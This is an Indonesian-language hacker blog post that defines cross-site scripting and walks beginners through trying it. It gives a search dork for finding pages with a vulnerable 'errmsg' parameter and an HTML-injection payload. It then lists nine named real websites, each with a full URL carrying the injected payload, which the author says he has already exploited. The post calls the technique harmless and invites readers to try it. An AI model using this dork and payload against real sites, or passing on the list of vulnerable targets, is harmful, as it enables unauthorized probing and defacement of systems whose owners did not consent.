XSS (Cross Site Scripting) - Pengertian & Uji Coba

Tadi ada salah satu teman yg bertanya tentang apa itu XSS dan bgaimana penggunaanx. Ok, mungkin saia bisa menjelaskan sedikit. Menurut salah satu web yg ada di Indonesia, XSS itu sendiri mempunyai pengertian suatu cara memasukkan code/script HTM kedalam suatu website dan dijalankan melalui browser di client. XSS merupakan pilihan para newbie (seperti saia) yg tidak mempunyai shell dan sploit, karena untuk melakukanx hanya dibutuhkan sebuah browser. Yg harus diinget adalah XSS hanya memasukan script kedalam URL site target.

Kita langsung uji coba :

Dork : inurl:/gen_confirm.php?errmsg=

Keliatan klo banyak sekali site yg bisa dibuat uji coba & pada kali ini saia mengambil salah satu site milik malaysia..

Coba anda liat address bar & coba anda hapus seluruh script dibelakang errmsg= lalu rubah menjadi <font+color=red+size=8>Q-Whil3</font>

Dan inilah yg terjadi :

Selamat mencoba, karena cara ini tidak berbahaya kok & dibawah ini saia berikan hasil2 web yg sudah saia coba ekploitasi dgn XSS. Let's check this :

1. http://www.all-from.eu/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
2. http://www.b2b-now.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
3. http://www.naukrialert.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
4. http://www.chinarab.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
5. http://daviddesoza.chukki-wukki.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
6. http://www.bangladeshmarketplace.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
7. http://www.adsdito.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
8. http://www.xeost.com/gen_confirm.php?es_type=prod&id=271&errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
9. http://www.crownhr.co.uk/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E

Q-Whil3
No System Is Safe

Tweet